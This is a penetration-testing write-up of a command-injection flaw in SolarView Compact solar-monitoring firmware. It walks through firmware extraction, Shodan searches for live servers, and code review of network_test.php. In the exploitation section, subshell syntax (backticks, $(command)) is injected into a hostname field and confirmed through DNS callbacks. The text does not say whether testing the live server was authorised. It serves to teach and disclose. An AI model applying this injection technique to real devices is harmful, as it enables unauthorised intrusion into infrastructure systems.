Remote Code Execution on SolarView Compact Firmware: A Technical Walkthrough

Introduction

Remote system management plays a crucial role in today’s connected environments, enabling real-time monitoring and control of firmware-based products via web interfaces. In this post, we demonstrate how we achieved Remote Code Execution (RCE) on a web server connected to a solar system monitoring firmware: SolarView Compact. This walkthrough covers four key stages: Firmware Extraction, Reconnaissance, Code Review, and Exploitation, and aims to offer insights for both internal knowledge-sharing and training future penetration testers.

1. Analysis and Firmware Extraction

The target product is the SolarView Compact, designed to monitor solar power systems. At the time of testing, the firmware version was ver 7.00. From the vendor website, we downloaded the update file: svcUpdate700.fpk.

Knowing that .fpk is a firmware package format, we can attempt to extract its internal contents. Binwalk is well-suited for this task. Running the command binwalk -Me <file-name> allowed us to unpack the firmware files.

Among the extracted directories, the html folder stood out, as it contains the web interface making it a promising initial attack vector.

2. Reconnaissance

The html directory contains numerous files worth reviewing.

However, before diving into the code, it's essential to determine where the corresponding web server is hosted on the internet. Identifying vulnerabilities in the code is only meaningful if they can be applied to a live target; this is where reconnaissance becomes critical.

We began with index.html, the main page, which might include product-specific keywords. Within it, we found an anchor tag linking to Solar_Menu.php.

To locate live instances, we leveraged Shodan, a powerful search engine for hardware and IoT devices. Using the http.html search filter, we obtained the following results:

The query returned several web servers; however, the Last-Modified headers indicated that most of them were running outdated versions. To ensure consistency with the code we extracted, we needed a more recent instance. During our reconnaissance, we observed that each web page included a copyright footer, a detail that could help refine our search.

What if we refined our Shodan search using the footer text and a recent date to find an active server?

Indeed, we identified a recent web server that appears to match the extracted code.

 3. Code Review

Manually reviewing all files would be time-consuming, so we opted for a more targeted approach. Since the server runs PHP, we expected functions like eval, system, and exec though these are well-known and likely already scrutinized.

Instead, we focused on less common functions, such as passthru(), which also executes system commands.

In network_test.php, we found that the host parameter is accepted without any input validation and is directly passed into commands like nslookup and ping. The entire operation is wrapped in a passthru() call making it vulnerable to Remote Code Execution (RCE).

4. Exploitation

Upon accessing the referenced file, we were presented with the following interface.

Command injection payloads like ;ls were rejected, as the input expected a valid hostname. However, when we used a Burp Collaborator URL as the hostname, we successfully received a DNS callback confirming external command execution.

 So how do we turn this into actual code execution? Since the hostname is passed into the passthru() function, we can inject subshells such as backticks (`command`) or $(command) within the hostname. This allows us to execute arbitrary commands, achieving blind RCE on the server and confirming it through DNS-based callbacks.

Mitigation

The vendor mitigated the vulnerability by restricting access to network_test.php using HTTP Basic Authentication, a simple but effective access control layer.

Key Takeaways

Points of Success:

●      Effective Recon: Leveraged Shodan and creative search filters to locate a live, relevant web instance.

●      Smart Code Review: Focused on less-common functions passthru() to identify exploitable code efficiently.

●      Confirmed RCE: Successfully triggered blind RCE using DNS-based command injection.

Points of Limitation:

●      Restricted Execution: Payloads containing special characters (id, ls) were blocked, limiting testing.

Lessons Learned

●       Firmware Management:

Firmware products often include embedded web servers for remote administration. Understanding the interaction between these components is crucial for identifying potential security risks.

●       Reconnaissance:

Recon is a versatile technique that can be adapted to various contexts. In this case, it enabled us to pinpoint relevant targets and validate our findings effectively.

●       Code Review:

The success of a code review depends on the approach. By focusing on specific, less-common PHP functions, we were able to efficiently uncover a critical vulnerability.